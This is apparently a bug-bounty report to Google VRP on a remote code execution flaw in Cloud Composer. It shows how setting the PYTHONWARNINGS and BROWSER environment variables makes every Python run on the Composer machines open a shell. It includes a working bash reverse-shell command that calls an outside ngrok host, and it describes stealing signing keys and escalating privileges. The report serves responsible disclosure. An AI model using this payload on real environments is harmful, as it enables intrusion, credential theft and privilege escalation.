Summary:
Composer RCE inside dag processor, triggerer, worker and webserver machines
Program:
Google VRP
Vulnerability type:
Remote Code Execution (RCE)
Details
It's possible to create a composer environment with environment variables such as:
PYTHONWARNINGS="all:0:antigravity.x:0:0"
BROWSER="/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19980 0>&1' & #%s"
Then, all the machines related to the composer environment will use these environment variables. Which will cause that any python execution will trigger a reverse shell.
Attack scenario
Any user with the permission
composer.environments.update
will be able to update the environment variables of a composer environment.
The attacker will gain access to (at least) 4 composer machines:
Dag processor
Triggerer
Worker
Webserver
These are machines maintained by GCP that, afaik, the user shouldn't be able to access.
With this access the user will be in complete control of the Composer (Airflow) environment, being able to access and modify the SAL databases, redis, steal the signing keys...
Stealing the signing keys the user will be able to maintain persistence over the airflow platform and escalate privileges.
Moreover, accessing these machines it might be possible that the attacker can have access to restricted places. As I wasn't sure if the user was expected to be able to access these machines, my guess was that he isn't, I didn't investigate further where those machines were located.
Finally, a user only having the
permission is going to be able to escalate privileges to the SA attached to the composer environment without needing the actAs permission of the Service Account.
Please, note that a user with enough permissions to create a composer environment it's also going to be able to access all those machines abusing the environment variables.
In the attachments of this report it's possible to find a video about how to user the update permission to add the environment variables inside a composer environment and get a shell inside the web server.
And then there are 3 more videos showing shells inside the dag processor, triggerer and worker. These are reverse shells that will come by waiting and triggering some dag. At the end composer is made by python and any python execution inside any machine will execute a reverse shell.